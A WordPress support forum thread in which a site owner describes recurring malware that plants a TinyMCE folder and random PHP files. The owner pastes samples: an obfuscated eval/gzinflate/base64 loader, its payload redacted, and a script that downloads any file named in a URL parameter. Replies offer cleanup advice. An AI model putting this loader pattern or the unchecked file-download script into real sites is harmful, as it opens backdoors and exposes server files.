Support » Fixing WordPress » TinyMCE folder and php file virus

  • Chad


    Hi all,

    We’ve been experiencing this massive virus on our server that injects a TinyMCE folder and random .php files throughout the website. I’ve done a site cleanup: install core WordPress, manually re-install plugins and re-download parent and child themes. Has anyone seen this virus before? Is there any way to pinpoint where the virus is coming from?

    Here are examples –

    <strong>This is what is inside this file: lkeja9jtww.php</strong>
    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    [code redacted by moderator]

    $a = str_replace($dgreusdi, "E", $a);
    eval (gzinflate(base64_decode($a)));

    This is what is inside this file: downloadebook.php

    $file_url = $_GET['filename'];
    header('Content-Type: application/octet-stream');
    header("Content-Transfer-Encoding: Binary"); 
    header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\""); 

    Thanks in advance!


    • This topic was modified 5 months, 3 weeks ago by Steve Stern.
Viewing 3 replies - 1 through 3 (of 3 total)
  • Is the TinyMCE folder in a theme or a plugin? If it is a plugin I would just delete the plugin and find a different plugin that gives you the TinyMCE editor. If it is part of your theme you will need to contact the theme developer to let them know their themes code has been compromised.

    Once you have removed the code in question I would carefully follow this guide. When you’re done going through that guide, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    Once you get your site working again please tag the thread resolved.



    Hi @binarywc,

    The TinyMCE folder is in the root of the website and is not a plugin or theme. This virus adds this folder among other random .php files throughout the folder. I’ve done these steps before but the virus still comes back. Is it possible this could be from a level higher on the server?

    Anything is possible. Honestly though, it sounds to me like your site has been compromised at a plugin or theme level. Would you mind sharing a list of your plugins and the name of the theme you are using?

Viewing 3 replies - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.